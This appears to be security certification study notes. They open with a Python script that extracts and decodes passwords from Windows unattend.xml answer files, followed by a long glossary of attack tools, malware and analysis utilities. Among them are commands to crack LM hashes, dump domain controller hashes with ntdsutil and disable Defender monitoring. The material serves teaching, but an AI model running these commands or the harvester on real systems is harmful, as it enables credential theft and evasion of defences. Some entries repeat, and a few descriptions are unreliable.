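def decode_value(value: str, plaintext: bool) -> str:
    if plaintext:
        return value
    raw = base64.b64decode(value)
    # UTF-16LE text of Latin characters has a NUL in every odd byte position
    if len(raw) >= 2 and raw[1::2] == b"\x00" * (len(raw) // 2):
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("latin-1")
    return text[:-len(SUFFIX)] if text.endswith(SUFFIX) else text


def extract_credentials(xml_text: str) -> list:
    """Return [{'context', 'username', 'password'}] for every password found."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    creds = []
    for elem in root.iter():
        if _tag(elem) not in ("Password", "AdministratorPassword"):
            continue
        value, plaintext = None, True               # PlainText defaults to true
        for child in elem:
            if _tag(child) == "Value":
                value = (child.text or "").strip()
            elif _tag(child) == "PlainText":
                plaintext = (child.text or "").strip().lower() == "true"
        if not value:
            continue
        owner = parent_of.get(elem)
        username = "Administrator" if _tag(elem) == "AdministratorPassword" else None
        for sibling in (owner if owner is not None else []):
            if _tag(sibling) in ("Username", "Name"):   # AutoLogon / LocalAccount
                username = (sibling.text or "").strip()
        creds.append({"context": _tag(owner) if owner is not None else "",
                      "username": username,
                      "password": decode_value(value, plaintext)})
    return creds


def scan_host(paths=CANDIDATE_PATHS) -> list:
    """Read-only check of the candidate locations on a live host."""
    found = []
    for path in paths:
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                found.extend(dict(c, file=path) for c in extract_credentials(fh.read()))
    return found


def make_sample_unattend() -> str:
    """Constructed sample answer file (made-up accounts and passwords)."""
    admin = encode_value("Summer2023!")
    svc = encode_value("Winter2024", utf16=True)
    return f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>{admin}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>helpdesk</Name>
            <Group>Administrators</Group>
            <Password><Value>Temp1234</Value><PlainText>true</PlainText></Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
      <AutoLogon>
        <Username>svc_deploy</Username>
        <Enabled>true</Enabled>
        <Password><Value>{svc}</Value><PlainText>false</PlainText></Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>"""


if __name__ == "__main__":
    for cred in extract_credentials(make_sample_unattend()):
        print(cred)
```

The defensive fix is the same on every host: delete the answer file after deployment
(Sysprep's /unattend leaves a copy behind) or at least strip the Password elements,
since anything the file contains is readable by every local user.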

\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\: group policy files under this path are readable
by every domain user. Attackers search them for stored credentials (for example,
cpassword values in Groups.xml, which decrypt with a published key) and, with write
access, modify the policies to perform unintended activities such as creating a new
account, disabling or modifying internal tools, ingress tool transfer, unwanted
service execution, and changing settings so that passwords can be retrieved in
plaintext.

C:\Windows\System32\osk.exe: Attackers create persistence and escalate privileges by
embedding and running malicious code within Windows accessibility features. The
On-Screen Keyboard is one accessibility feature abused by attackers.

***********
Wireshark: Wireshark lets you capture and interactively browse the traffic running
on a computer network.

Vindicate: an LLMNR/NBNS/mDNS spoofing detection toolkit for network administrators.
Security professionals use this tool to detect name service spoofing.


BuzzSumo: BuzzSumo’s advanced social search engine finds the most shared content
for a topic, author, or domain. It shows the shared activity across all the major
social networks including Twitter, Facebook, LinkedIn, Google Plus, and Pinterest.



Spokeo: Attackers can use the Spokeo people search online service to search for
people belonging to the target organization. Using this service, attackers obtain
information such as phone numbers, email addresses, address history, age, date of
birth, family members, social profiles, and court records.

Netcraft: Attackers use various online tools such as Netcraft, Shodan, and Censys
to detect the operating system used at the target organization.

Photon: Attackers can use tools such as Photon to retrieve archived URLs of the
target website from archive.org.


KFSensor: KFSensor is a Windows-based honeypot intrusion detection system (IDS). It
acts as a honeypot designed to attract and detect hackers and worms by simulating
vulnerable system services and Trojans.

Recon-ng: Recon-ng is a full-featured reconnaissance framework designed to provide a
powerful environment to conduct web-based reconnaissance quickly and thoroughly. It
assists attackers in gathering information from public source-code repositories.

Reverse Lookup: The Reverse Lookup tool performs a reverse IP lookup by taking an IP
address and locating the DNS PTR record for that IP address.

ShellPhish: ShellPhish is a phishing tool used to phish user credentials from
various social networking platforms such as Instagram, Facebook, Twitter, and
LinkedIn.

NodeXL: Attackers use various tools such as Gephi, SocNetV, and NodeXL to construct
and analyze social networks and obtain critical information about the target
organization/users.

Mention: Mention is an online reputation tracking tool that helps attackers monitor
the web, social media, forums, and blogs to learn more about the target brand and
industry.

HTTrack Web Site Copier: HTTrack is an offline browser utility. It downloads a
website from the Internet to a local directory and recursively builds all the
directories, including HTML, images, and other files from the web server, on another
computer.

Burp Suite: Burp Suite is an integrated platform for performing security testing of
web applications. Its various tools work together to support the entire testing
process, from initial mapping and analysis of an application's attack surface to
finding and exploiting security vulnerabilities.

Job sites such as indeed.com, dice.com, and linkup.com provide online job listings,
which reveal the technologies a target organization uses. Financial services such as
Google Finance, MSN Money, Yahoo Finance, and Investing.com provide a large amount
of useful information such as the market value of a company's shares, company
profile, competitor details, stock exchange rates, corporate press releases, and
financial reports, along with news and blog articles about the corporation.

Metagoofil: Metagoofil extracts metadata of public documents (pdf, doc, xls, ppt,
docx, pptx, and xlsx) belonging to a target company.

Sherlock: To search a vast number of social networking sites for a target username.
This tool helps the attacker to locate the target user on various social networking
sites along with the complete URL.


OpUtils: a network tool set (ManageEngine) that uses SNMP to monitor, diagnose, and
troubleshoot IT resources; it can also be used for SNMP enumeration.

Sublist3r: Sublist3r is a Python script designed to enumerate the subdomains of
websites using OSINT. It enables you to enumerate subdomains across multiple sources
at once.

SearchSploit: Attackers can also use SearchSploit, a command-line search tool for
Exploit-DB that allows taking a copy of the Exploit Database for remote use. It
allows attackers to perform detailed offline searches through their locally
checked-out copy of the repository.

Spyse: Spyse is an online platform that can be used to collect and analyze
information about devices and websites available on the Internet.

DroidSniff: DroidSniff is an Android app for security analysis in wireless networks
that can capture Facebook, Twitter, LinkedIn, and other accounts.

MITRE ATT&CK framework: MITRE ATT&CK is a globally accessible knowledge base of
adversary tactics and techniques based on real-world observations.

GitLab: Source code repositories are online services or tools available on internal
servers or hosted on third-party websites such as GitHub, GitLab, SourceForge, and
BitBucket. These sites can contain sensitive data such as configuration files,
private Secure Shell (SSH) and Secure Sockets Layer (SSL) keys, source-code files,
dynamic libraries, and software tools developed by contributors, which attackers can
leverage to launch attacks on the target organization.

Netcraft: Netcraft provides Internet security services, including anti-fraud and
anti-phishing services, application testing, and PCI scanning.

theHarvester: theHarvester is a tool designed to be used in the early stages of a
penetration test. It is used for open-source intelligence gathering and helps to
determine a company's external threat landscape on the Internet.

OSRFramework scripts:
usufy.py - Checks for a user profile on up to 290 different platforms
mailfy.py - Checks for the existence of a given email address
searchfy.py - Performs a query on the platforms in OSRFramework
domainfy.py - Checks for the existence of domains
phonefy.py - Checks for the existence of a given series of phone numbers
entify.py - Uses regular expressions to extract entities

L0phtCrack: L0phtCrack is a password auditing and recovery application. It recovers
lost Microsoft Windows passwords with the help of dictionary, hybrid, rainbow table,
and brute-force attacks, and it also reports the strength of the passwords.

Nagios: Nagios provides complete monitoring of SAN solutions, including disk usage,
directories, file count, file presence, file size, RAID array status, and more.


FOCA Features:
Web Search - Searches for hosts and domain names through URLs associated with the
main domain. Each link is analyzed to extract new host and domain names.

DNS Search - Checks each domain to ascertain the host names configured in its NS,
MX, and SPF records, to discover new host and domain names.

IP Resolution - Resolves each host name via DNS to obtain the IP address associated
with it. To perform this task accurately, the tool also queries the organization's
internal DNS.

PTR Scanning - For each IP address found, FOCA performs reverse (PTR) lookups across
the same network segment to find more servers.

Bing IP - For each IP address discovered, FOCA runs a Bing "ip:" search to find
other domain names hosted on that address.

Common Names - Performs dictionary attacks against the DNS to guess common host
names.



RPCScan: RPCScan communicates with RPC services and checks misconfigurations on NFS
shares.

KeyGrabber: A KeyGrabber hardware keylogger is an electronic device capable of
capturing keystrokes from a PS/2 or USB keyboard. It comes in various forms, such as
KeyGrabber USB, KeyGrabber PS/2, and KeyGrabber Nano Wi-Fi.

ntpdate parameters and their respective functions:
-B : Force the time to always be slewed
-b : Force the time to be stepped
-d : Enable debugging mode
-q : Query only; do not set the clock

NetScanTools Pro: NetScanTools Pro’s SMTP Email Generator tool tests the process of
sending an email message through an SMTP server.

Wireshark: It is a packet analyzer used for network examination, protocol
inspection, and troubleshooting.

JXplorer: It is a Java-based application used to search any LDAP directory.

Snmpcheck: Its goal is to automate the process of gathering information on any
device with SNMP support (Windows, Unix-like, network appliances, printers, etc.).

Professional Toolset: DNS interrogation tools such as Professional Toolset
(https://tools.dnsstuff.com) and DNS Records (https://network-tools.com) enable the
user to perform DNS footprinting.

Infoga: Infoga is a tool used for gathering email account information from
different public sources and it checks if an email was leaked using the
haveibeenpwned.com API.

Octoparse: Octoparse offers automatic data extraction, as it quickly scrapes web
data without coding and turns web pages into structured data.

Metagoofil: Metagoofil extracts metadata of public documents (pdf, doc, xls, ppt,
docx, pptx, and xlsx) belonging to a target company.

Secure Shell Bruteforcer: It is a password cracking tool that allows you to reset
unknown or lost Windows local administrator, domain administrator, and other user
account passwords. In the case of forgotten passwords, it even allows users instant
access to their locked computer without reinstalling Windows.

Audio Spyware: Audio spyware is a sound surveillance program designed to record
sound onto a computer. The attacker can silently install the spyware on the
computer, without the permission of the computer user and without sending them any
notification.

OmniHide Pro: OmniHide PRO allows you to hide any secret file within an innocuous
image, video, music file, etc.

DeepSound: DeepSound allows you to hide any secret data in audio files (WAV and
FLAC). It also allows you to extract secret files directly from audio CD tracks. In
addition, it can encrypt secret files, thereby enhancing security.

DPAT: DPAT is a Python script that generates password use statistics from password
hashes dumped from a domain controller (DC) and a password crack file such as
hashcat.pot generated using the hashcat tool during password cracking.

Spytech SpyAgent: Spytech SpyAgent is computer spy software that allows you to
monitor everything users do on your computer—in total secrecy.

Scranos: Scranos is a trojanized rootkit that masquerades as cracked software or a
legitimate application, such as anti-malware, a video player, or an ebook reader,
to infect systems and perform data exfiltration that damages the reputation of the
target and steals intellectual property.

StegoStick: StegoStick is a steganographic tool that allows attackers to hide any
file in any other file.

./hashcat.bin -m 3000 -a 3 users.ntds -1 ?a ?1?1?1?1?1?1?1 --increment

Run the above command to crack LM hashes of users.ntds in the hashcat.pot format.

john --format=LM users.ntds

To crack LM hashes using John the Ripper, run the above command.

ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q

Run the above command to dump the password hashes from the domain controller (DC).
This requires sufficient space in the C drive to store the output.

Set-MpPreference -DisableRealtimeMonitoring $true

Attackers can disable the security monitoring option using the above command before
performing enumeration using the PowerView tool.

THC-Hydra: THC-Hydra is a network logon cracker that supports many different
services, such as IPv6 and Internationalized RFC 4013. It comes with a GUI and
supports HTTP proxy and SOCKS proxy.

Medusa: Medusa is a password-cracking tool.

Hashcat: Hashcat is a cracker compatible with multiple OSs and platforms and can
perform multi-hash (MD4, MD5; SHA-224, SHA-256, SHA-384, SHA-512; RIPEMD-160; etc.),
multi-device password cracking.

OllyDbg: It is a buffer overflow detection tool and is a 32-bit assembler-level
analyzing debugger for Microsoft® Windows®. Its emphasis on binary code analysis
makes it particularly useful when the source is unavailable.

Veracode: It is a buffer overflow detection tool that helps security professionals
to detect buffer overflow vulnerabilities.

GhostPack Seatbelt: Attackers use Seatbelt to collect host information including
PowerShell security settings, Kerberos tickets, and items in Recycle Bin. Using
Seatbelt, attackers perform security checks to find insecurities, which can be
exploited to launch active attacks on the host network.

Robber: Robber is an open-source tool that helps attackers to find executables
prone to DLL hijacking.

Dylib Hijack Scanner: Dylib Hijack Scanner (DHS) is a simple utility that will scan
your computer for applications that are either susceptible to dylib hijacking or
have been hijacked.

CCleaner: CCleaner is a system optimization, privacy, and cleaning tool. It allows
attackers to remove unused files and cleans traces of Internet browsing details
from the target PC. With this tool, an attacker can very easily erase his/her
tracks.

OpenStego: OpenStego is a steganography application that provides the following
functions.
Data Hiding: It can hide any data within a cover file (e.g., images).
Watermarking: It can watermark files (e.g., images) with an invisible signature,
which can be used to detect unauthorized file copying.

Vindicate: Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network
administrators. Security professionals use this tool to detect name service
spoofing. This tool helps them to quickly detect and isolate attackers on their
network. It is designed to detect the use of hacking tools such as Responder,
Inveigh, NBNSpoof, and Metasploit’s LLMNR, NBNS, and mDNS spoofers while avoiding
false positives.

Sherlock: Attackers use Sherlock to search a vast number of social networking sites
for a target username. This tool helps the attacker to locate the target user on
various social networking sites along with the complete URL.

theHarvester: theHarvester is a tool designed to be used in the early stages of a
penetration test. It is used for open-source intelligence gathering and helps to
determine a company's external threat landscape on the Internet. Attackers use this
tool to perform enumeration on the LinkedIn social networking site to find
employees of the target company along with their job titles.

Qualys VM: Qualys VM helps to continuously identify threats and monitor unexpected
changes in a network before they turn into breaches.

GrayFish Rootkit: GrayFish is a Windows kernel rootkit that runs inside the Windows
operating system and provides an effective mechanism, hidden storage and malicious
command execution while remaining invisible. It injects its malicious code into the
boot record which handles the launching of Windows at each step. It implements its
own Virtual File System (VFS) to store the stolen data and its own auxiliary
information.

Hardware/Firmware Rootkit: Hardware/firmware rootkits use devices or platform
firmware to create a persistent malware image in hardware, such as a hard drive,
system BIOS, or network card. The rootkit hides in firmware as the users do not
inspect it for code integrity. A firmware rootkit implies the use of creating a
permanent delusion of rootkit malware.

Boot Loader Level Rootkit: Boot loader level (bootkit) rootkits function either by
replacing or modifying the legitimate bootloader with another one. The boot loader
level (bootkit) can activate even before the operating system starts. So, the
boot-loader-level (bootkit) rootkits are serious threats to security because they
can help in hacking encryption keys and passwords.

EquationDrug Rootkit: EquationDrug is a dangerous computer rootkit that attacks the
Windows platform. It performs targeted attacks against various organizations and
arrives on the infected system by being downloaded and executed by the Trickler
dubbed "DoubleFantasy", covered by TSL20110614-01 (Trojan.Win32.Micstus.A). It
allows a remote attacker to execute shell commands on the infected system.

Trojan.Gen: Trojan.Gen is a generic detection for many individual but varied
Trojans for which specific definitions have not been created. A generic detection
is used because it protects against many Trojans that share similar
characteristics.

Senna Spy Trojan Generator: This is a Trojan that comes hidden in malicious
programs. Once the source (carrier) program is installed, this Trojan attempts to
gain "root" access (administrator level access) to your computer without your
knowledge.

DarkHorse Trojan Virus Maker: DarkHorse Trojan Virus Maker is used to create
user-specified Trojans by selecting from various options available. The Trojans
created act as per the options selected while creating them. For example, if you
choose the option Disable Process, the Trojan disables all processes on the target
system. The screenshot in the slide shows a snapshot of Dark Horse Trojan Virus
Maker that displays its various available options.

Win32.Trojan.BAT: Win32.Trojan.BAT is a system-destructive trojan program. It will
crash the system by deleting files.

BitCrypter: An attacker can use BitCrypter to encrypt and compress 32-bit
executables and .NET apps without affecting their direct functionality. A Trojan or
malicious piece of software can be encrypted into legitimate software to bypass
firewalls and antivirus software. BitCrypter supports a wide range of OSs from
Windows XP to the latest Windows 10.

Divergent: Divergent is a type of fileless malware that exploits NodeJS, which is a
program that executes JavaScript outside the browser. Using Divergent fileless
malware, attackers generate revenue by targeting corporate networks through
click-fraud attacks.

BotenaGo: The BotenaGo exploit kit written in the Go scripting language contains
over 30 variants of exploits and is capable of attacking millions of IoT and routing
devices worldwide. BotenaGo was first discovered in November 2021 and was detected
as Mirai botnet malware by antivirus software. BotenaGo is successfully being used
by attackers in distributing DDoS functionalities by spreading payloads to victim
devices.

Process Monitor: Process Monitor is a monitoring tool for Windows that shows real-
time file system, registry, and process/thread activity.

Splunk: It is a SIEM tool that can automatically collect all the event logs from
all the systems present in the network.

IExpress Wizard: It is a wrapper tool that guides the user to create a self-
extracting package that can automatically install the embedded setup files,
Trojans, etc.

Emotet: It is a dropper/downloader for well-known banking Trojans such as Zeus
Panda Banker, Trickbot, and IcedID that is used to infect victims globally.

Godzilla: It is a downloader that can be used for deploying malware on the target
machine.

BlackMatter: BlackMatter is dangerous ransomware written in C. This ransomware uses
encryption keys such as RSA public and AES keys for initializing and implementing
Salsa20 encryption on the targeted files. Using this malware, attackers can also
gain control over domain controllers, ACLs, and other user access controls (UACs).

RemoteExec: RemoteExec remotely installs applications, executes programs/scripts,
and updates files and folders on Windows systems throughout the network. This
allows an attacker to modify the registry, change local admin passwords, disable
local accounts, and copy/update/delete files and folders.

Mirai: Mirai is a self-propagating IoT botnet that infects poorly protected
Internet devices (IoT devices). Mirai uses telnet port (23 or 2323) to find those
devices that are still using their factory default username and password.

IExpress Wizard: IExpress Wizard is a wrapper program that guides the user to
create a self-extracting package that can automatically install the embedded setup
files, Trojans, etc.

BlackCat: BlackCat is a dreadful ransomware attack written in Rust and profoundly
known as ALPHA (AlphaVM, AlphaV). It is specially crafted ransomware comprising 4
encryption routines and supports several encryption algorithms such as ChaCha20 and
AES. The attack mainly focuses on crashing targeted devices and running processes,
applications, and VMs during their encryption process. BlackCat employs phishing
tactics on the victims by delivering its payload using vulnerable applications and
exposed toolsets.

Windows Service Manager commands:

Create services:
srvman.exe add <file.exe/file.sys> [service name] [display name]
[/type:<service type>] [/start:<start mode>] [/interactive:no] [/overwrite:yes]

Delete services:
srvman.exe delete <service name>

Start/stop/restart services:
srvman.exe start <service name> [/nowait] [/delay:<delay in msec>]
srvman.exe stop <service name> [/nowait] [/delay:<delay in msec>]
srvman.exe restart <service name> [/delay:<delay in msec>]

Install and start a legacy driver with a single call:
srvman.exe run <driver.sys> [service name] [/copy:yes] [/overwrite:no]
[/stopafter:<msec>]

Sheep Dip: Sheep dipping refers to the analysis of suspect files, incoming
messages, etc. for malware. The users isolate the sheep-dipped computer from other
computers on the network to block any malware from entering the system. Before
performing this process, it is important to save all downloaded programs on
external media such as CD-ROMs or DVDs. A computer used for sheep dipping should
have tools such as port monitors, file monitors, network monitors, and one or more
anti-virus programs for performing malware analysis of files, applications,
incoming messages, external hardware devices (such as USB, Pen drive, etc.), and so
on.

DroidSheep: DroidSheep is a tool used for session hijacking on Android devices
connected to a common wireless network. It gets the session ID of an active user on
the Wi-Fi network and uses it to access the website as an authorized user. The
DroidSheep user can easily see what the authorized user is doing or seeing on the
website. It can also hijack the social account by obtaining the session ID.

Sandbox: App sandboxing is a security mechanism that helps protect systems and
users by limiting the resources the app can access to its intended functionality on
the mobile platform. Often, sandboxing is useful in executing untested code or
untrusted programs from unverified third parties, suppliers, untrusted users, and
untrusted websites. This enhances security by isolating an application to prevent
intruders, system resources, malware such as Trojans and viruses, and other
applications from interacting with the protected app.

Malwarebytes: It is a tool for Windows operating system that provides comprehensive
security that blocks malware and hackers. It protects you from threats that
traditional antivirus isn't smart enough to stop.

BinText is a small text extractor utility that can extract text from any kind of
file and includes the ability to find plain ASCII text, Unicode (double byte ANSI)
text and Resource strings, providing useful information for each item in the
optional "advanced" view mode.

UPX (Ultimate Packer for Executables) is a free and open source executable packer
supporting a number of file formats from different operating systems.

ASPack is an advanced EXE packer created to compress Win32 executable files and to
protect them against non-professional reverse engineering.

PE Explorer lets you open, view and edit a variety of different 32-bit Windows
executable file types (also called PE files) ranging from the common, such as EXE,
DLL and ActiveX Controls, to the less familiar types, such as SCR (Screensavers),
CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL and more (including executable
files that run on MS Windows Mobile platform).

Process Monitor: Process Monitor is a monitoring tool for Windows that shows real-
time file system, Registry, and process/thread activity. Its features include:
More data captured for operation input and output parameters.
Non-destructive filters allow you to set filters without losing data.
Capture of thread stacks for each operation makes it possible in many cases to
identify the cause of an operation.
Reliable capture of process details, including image path, command line, user and
session ID.
Configurable and moveable columns for any event property.
Filters can be set for any data field, including fields not configured as columns.
Advanced logging architecture scales to tens of millions of captured events and
gigabytes of log data.
Process tree tool shows the relationship of all processes referenced in a trace.
Native log format preserves all data for loading in a different Process Monitor
instance.

Netstat: It displays active TCP connections, ports on which the computer is
listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP,
ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over
IPv6, and UDP over IPv6 protocols).

TCPView: TCPView is a Windows program that shows detailed listings of all TCP and
UDP endpoints on the system, including the local and remote addresses, and the
state of TCP connections. It provides a superset of the Netstat program that ships
with Windows.

IDA Pro: IDA Pro is a multi-platform disassembler and debugger that explores binary
programs, for which source code is not always available, to create maps of their
execution. It shows the instructions in the same way as a processor executes them
in a symbolic representation called assembly language. Thus, it is easy for you to
find the harmful or malicious processes.

Startup programs monitoring is used to detect suspicious startup programs and
processes.

Registry monitoring is used to examine the changes made to the system’s registry by
malware.

Process monitoring is used to scan for suspicious processes.

Windows services monitoring traces malicious services initiated by the malware.
Since malware employs rootkit techniques to manipulate HKEY_LOCAL_MACHINE\System\
CurrentControlSet\Services registry keys to hide its processes, Windows service
monitoring can be used to identify such manipulations.

readelf: readelf displays information about one or more ELF object files; it is
used to extract static artifacts from an ELF executable.
readelf -s <malware-sample> : to extract symbols from an ELF executable

readelf -l <malware-sample> : to retrieve ELF program headers

readelf --file-header <malware-sample> : to retrieve the information contained in
the ELF header at the start of the file

strings malware-sample > str.txt : to extract strings from an ELF executable file

readelf -h <malware-sample> : Execute this command to retrieve the information
contained in the ELF header at the start of the file (-h is the short form of
--file-header)

Loggly: It is a log monitoring/analysis tool that can be used by security analysts
as a primary source of information and helps in identifying security gaps with the
systems or network.

LIEF: LIEF is an acronym for Library to Instrument Executable Formats. It is a
cross-platform tool developed by QuarksLab for parsing and manipulating different
executable formats including Mach-O binary formats.

Verisys: It is a file integrity checking tool that can help analysts scan for
suspicious files and folders and detect any Trojans installed as well as system
file modifications.

python oledump.py '<path to the suspect document>' : Run this command to list the
OLE streams in the suspect document. Security experts can then extract the contents
of any particular macro stream with the oledump tool.

ophcrack: ophcrack is a Windows password-cracking tool that uses rainbow tables for
cracking passwords. It comes with a graphical user interface (GUI) and runs on
different OSs such as Windows, Linux/UNIX, etc.

strace commands:
strace -p <ProcessID> : Run this command for attaching the strace tool to the
active process.

strace -c ls > /dev/null : Run this command to count time, calls, and errors for
each system call.

strace -o out.txt ./<sample file> : Execute this command to extract system calls
and save the output in a text file.

strace -P <given path> ls /var/empty : Execute this command to view only system
calls accessing a specific or given path.

xHelper: Android/Trojan.Dropper.xHelper is a variant of Android/Trojan.Dropper.

cSploit: cSploit is an Android network analysis and penetration suite that is used
to map the local network, fingerprint hosts' operating systems and open ports,
perform integrated traceroute, forge TCP/UDP packets, and perform MITM attacks such
as password sniffing, JavaScript injection, capturing real-time network traffic,
DNS spoofing, and session hijacking.

Intezer: Intezer is a malware analysis platform that scans files, URLs, endpoints,
and memory dumps. It extracts strings from uploaded malware samples and identifies
whether those strings are used in other files. It reduces the effort of malware
analysts by analyzing unknown malware that is difficult to trace.

Network Spoofer: Network Spoofer allows you to change websites on others’ computers
via an Android phone.

ASPack: It is a packaging/obfuscation tool that can be used by a security analyst
to determine if the file includes packed elements and also locate the tool or
method used for packing it.

Mach-O: Mach object (Mach-O) is an executable file format similar to the Portable
Executable (PE) format for Windows and ELF for Linux. It is associated with
binaries present in macOS and iOS.

TCPView: TCPView is a Windows program that shows detailed listings of all TCP and
UDP endpoints on the system, including the local and remote addresses, and the
state of the TCP connections.

Monit: It is a process monitoring tool that helps security analysts in
understanding the processes that the malware initiates and takes over after
execution.

Veracode: It is a buffer overflow detection tool that helps security analysts to
detect buffer overflow vulnerabilities.

pagestuff: The pagestuff utility can be used to view Mach-O executable files and
find information regarding the logical pages associated with those files. It helps
identify malicious code and Objective-C methods such as deleteAppBySelf.

BeRoot: BeRoot is a post-exploitation tool to check common misconfigurations to
find a way to escalate privilege.

RainbowCrack: RainbowCrack cracks hashes with rainbow tables, using a time-memory
trade-off algorithm. Attackers use the RainbowCrack tool to crack the password
hashes of the target system.

Mimikatz: Mimikatz allows attackers to pass Kerberos TGT to other computers and
sign in using the victim’s ticket. The tool also helps in extracting plaintext
passwords, hashes, PIN codes, and Kerberos tickets from memory.

strace: The strace tool can be used to view or trace the system calls in a Linux
environment. The strace tool intercepts and records system calls by a process and
the signals received by the process.

Kiuwan: It is a buffer overflow detection tool that is used by security experts to
detect buffer overflow vulnerabilities.

ElectroRAT: ElectroRAT, a Go-program-based RAT, is designed to be compatible with
common OSes such as Windows, macOS, and Linux. The Trojan is delivered through a
downloadable application to cryptocurrency users for the malware creators to steal
the private keys of victims and access their crypto wallets.

PoisonIvy: The PoisonIvy remote administration tool is created and controlled by a
PoisonIvy management program or kit. The PoisonIvy kit consists of a graphical user
interface, and the backdoors are small (typically, <10 kB).

EquationDrug: EquationDrug is a dangerous computer rootkit that attacks the Windows
platform. It performs targeted attacks against various organizations and lands on
the infected system by being downloaded and executed by the Trickler dubbed
"DoubleFantasy," covered by TSL20110614-01 (Trojan.Win32.Micstus.A). It allows a
remote attacker to execute shell commands on the infected system.

BitCrypter: BitCrypter is used to encrypt and compress 32-bit executables and .NET
apps without affecting their direct functionality. A Trojan or malicious piece of
software can be encrypted into legitimate software to bypass firewalls and
antivirus software. BitCrypter supports a wide range of OSs, from Windows XP to the
latest Windows 10.

Resource Hacker: Resource Hacker™ is a resource editor for 32bit and 64bit Windows®
applications. It's both a resource compiler (for *.rc files), and a decompiler -
enabling viewing and editing of resources in executables (*.exe; *.dll; *.scr;
etc.) and compiled resource libraries (*.res, *.mui).

Ghidra: Ghidra is a software reverse engineering (SRE) framework created and
maintained by the National Security Agency Research Directorate. This framework
includes a suite of full-featured, high-end software analysis tools that enable
users to analyze compiled code on a variety of platforms including Windows, macOS,
and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and
scripting, along with hundreds of other features.

Hakiri: Hakiri monitors Ruby apps for dependency and code security vulnerabilities.

Snyk: Snyk is the platform developers choose to build cloud native applications
securely.

DriverView: This utility displays a list of all the device drivers currently loaded
on the system along with information such as the load address of the driver,
description, version, and product name.

HashMyFiles: It provides information about the file, such as the full path of the
file, date of creation, date of modification, file size, file attributes, file
version, and extension, which helps in searching for and comparing similar files.

Foren6: Attackers use tools such as Foren6 to sniff the traffic of IoT devices.
Foren6 is a non-intrusive 6LoWPAN network analysis tool.

Gqrx: Gqrx is an SDR implemented with the help of the GNU Radio and Qt GUI tool.
Attackers use Gqrx to observe the frequency bands of temperature/humidity sensors,
light switches, car keys, M-bus transmitters, etc. Gqrx can also enable an attacker
to listen to or eavesdrop on radio FM frequencies or any radio conversations.

RFCrack: Attackers use the RFCrack tool to obtain the rolling code sent by the
victim to unlock a vehicle and later use the same code for unlocking and stealing
the vehicle.

Gobuster: Gobuster is a Go-programming-based directory scanner that allows
attackers to perform fast-paced enumeration of hidden files and directories of a
target web application. It is a command-oriented tool used to brute-force URIs in
websites, DNS subdomains, names of virtual hosts on the target server, etc.

SockDetour: SockDetour is fileless malware that compromises a Windows system’s
legitimate processes and builds a secure C2 communication channel without requiring
a listening port to be open. Using SockDetour, attackers create a stealthy backup
backdoor that can continue its operation even after the primary backdoor is
detached from the infected machine.

China Chopper: Attackers use this web shell tool to gain remote control over target
web servers.

Astra: Attackers use the Astra tool to detect and exploit underlying
vulnerabilities in a REST API. Astra can discover and test authentication flows
such as login and logout; this feature makes it easy for attackers to incorporate
it into the CI/CD pipeline.

beSTORM: beSTORM is a smart fuzzer that detects buffer overflow vulnerabilities by
automating and documenting the process of delivering corrupted inputs and watching
for an unexpected response from the application.

Universal Radio Hacker: Universal Radio Hacker (URH) is software for investigating
unknown wireless protocols used by various IoT devices.

x64dbg: It is a debugging tool that can be used by security experts to identify the
language used for programming the malware, APIs that reveal its function, etc.
Based on the reconstructed assembly code, you can inspect the program logic and
recognize its threat potential.

KillerBee: It is an IoT hacking tool used by attackers to exploit target IoT
devices and networks to perform various attacks such as DDoS, jamming, and
BlueBorne attacks.

Fing: Fing is a set of network tools that are used to identify all the devices
connected to any network, obtain the IP address, MAC address, device name, model,
and vendor of any connected device, and retrieve advanced information such as
NetBIOS, UPnP, Bonjour names, properties, and device types.

Cydia: Cydia is a software application for iOS that enables a user to find and
install software packages (including apps, interface customizations, and system
extensions) on a jailbroken iPhone, iPod Touch, or iPad.

Apricot: Apricot is a web-based mirror OS for the latest iPhones. It supports iOS
13.2 devices. Users can run this mirror iOS version with the default iOS 13.2
simultaneously. Apricot features provide a realistic experience for your iOS 13.2
iPhone.

pagestuff: The pagestuff utility can be used to view Mach-O executable files and
find information regarding the logical pages associated with those files. It also
helps security analysts to identify malicious code and Objective-C methods such as
deleteAppBySelf.

Splint: It is a buffer overflow detection tool that helps security analysts to
detect buffer overflow vulnerabilities.

Pupy: It is a privilege escalation tool that helps attackers to install, execute,
delete, and/or modify the restricted resources on the victim machine.

olevba: The olevba tool can be used to view the source code of all VBA macros
embedded within a document and to identify suspicious VBA keywords and obfuscation
methods used by malware.

Jv16 PowerTools: Jv16 PowerTools is a PC system utility software that works by
erasing unnecessary files and data, cleaning the Windows registry, automatically
fixing system errors, and optimizing your system. It allows you to scan and monitor
the registry.

ClamWin: ClamWin is a Free Antivirus program for Microsoft Windows 10 / 8 / 7 /
Vista / XP / Me / 2000 / 98 and Windows Server 2012, 2008 and 2003.

ZeuS: ZeuS, also known as Zbot, is a powerful banking trojan that explicitly
attempts to steal confidential information such as system information, online
credentials, and banking details. Zeus is spread mainly through drive-by downloads
and phishing schemes.

BetterCAP: bettercap is an ARP poisoning tool; it is also the Swiss Army knife for
WiFi, Bluetooth Low Energy, wireless HID hijacking, and Ethernet network
reconnaissance and MITM attacks.

DNSRecon: DNSRecon is a zone enumeration tool that assists users in enumerating DNS
records such as A, AAAA, and CNAME. It also performs NSEC zone enumeration to
obtain DNS record files of a target domain.

Svmap: Svmap is an open-source scanner that identifies SIP devices and PBX servers
on a target network. It can be helpful for system administrators when used as a
network inventory tool.

